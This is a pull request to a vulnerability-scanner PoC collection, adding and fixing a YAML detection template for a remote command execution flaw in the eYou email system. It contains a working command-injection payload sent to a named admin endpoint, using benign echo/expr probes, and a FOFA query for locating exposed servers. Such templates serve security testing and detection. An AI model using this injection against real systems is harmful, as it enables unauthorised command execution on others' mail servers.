### PR TITLE
eyou-email-system-rce

### DIFF
--- a/pocs/eyou-email-system-rce.yml
+++ b/pocs/eyou-email-system-rce.yml
@@ -1,20 +1,18 @@
 name: poc-yaml-eyou-email-system-rce
 set:
-  r1: randomLowercase(8)
-  r2: randomLowercase(8)
-  r3: randomLowercase(8)
-  r4: randomLowercase(8)
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
 rules:
   - method: POST
     path: /webadm/?q=moni_detail.do&action=gragh
     headers:
       Content-Type: application/x-www-form-urlencoded
     body: |
-      type='|echo%20{{r1}}${{{r2}}}{{r3}}^{{r4}}||'
+      type=type='|expr%20{{r1}}%20%2B%20{{r2}}||'
     expression: |
-      response.status == 200 && (response.body.bcontains(bytes(r1 + r3 + "^" + r4)) || response.body.bcontains(bytes(r1 + "${" + r2 + "}" + r3 + r4)))
+      response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
 detail:
-  author: Print1n(https://print1n.top)
+  author: Print1n(http://print1n.top)
   description: 亿邮电子邮件系统 远程命令执行漏洞
   links:
     - https://fengchenzxc.github.io/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%BA%BF%E9%82%AE/%E4%BA%BF%E9%82%AE%E7%94%B5%E5%AD%90%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/

--- a/pocs/eyou-email-system-rce.yml
+++ b/pocs/eyou-email-system-rce.yml
@@ -8,7 +8,7 @@ rules:
     headers:
       Content-Type: application/x-www-form-urlencoded
     body: |
-      type=type='|expr%20{{r1}}%20%2B%20{{r2}}||'
+      type='|expr%20{{r1}}%20%2B%20{{r2}}||'
     expression: |
       response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
 detail:

--- a/pocs/eyou-email-system-rce.yml
+++ b/pocs/eyou-email-system-rce.yml
@@ -1,0 +1,20 @@
+name: poc-yaml-eyou-email-system-rce
+set:
+  r1: randomLowercase(8)
+  r2: randomLowercase(8)
+  r3: randomLowercase(8)
+  r4: randomLowercase(8)
+rules:
+  - method: POST
+    path: /webadm/?q=moni_detail.do&action=gragh
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      type='|echo%20{{r1}}${{{r2}}}{{r3}}^{{r4}}||'
+    expression: |
+      response.status == 200 && (response.body.bcontains(bytes(r1 + r3 + "^" + r4)) || response.body.bcontains(bytes(r1 + "${" + r2 + "}" + r3 + r4)))
+detail:
+  author: Print1n(https://print1n.top)
+  description: 亿邮电子邮件系统 远程命令执行漏洞
+  links:
+    - https://fengchenzxc.github.io/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%BA%BF%E9%82%AE/%E4%BA%BF%E9%82%AE%E7%94%B5%E5%AD%90%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
亿邮电子邮件系统 远程命令执行
## 测试环境
fofa   body="亿邮电子邮件系统"
## 备注
与#1167是同一个漏洞，但是原 PoC 存在问题，缺少 URL 编码
![image](https://user-images.githubusercontent.com/73928418/121107666-e58fd880-c83a-11eb-94b3-f0ec165d3de6.png)
![image](https://user-images.githubusercontent.com/73928418/121107697-f6d8e500-c83a-11eb-91e5-93ab31295acb.png)
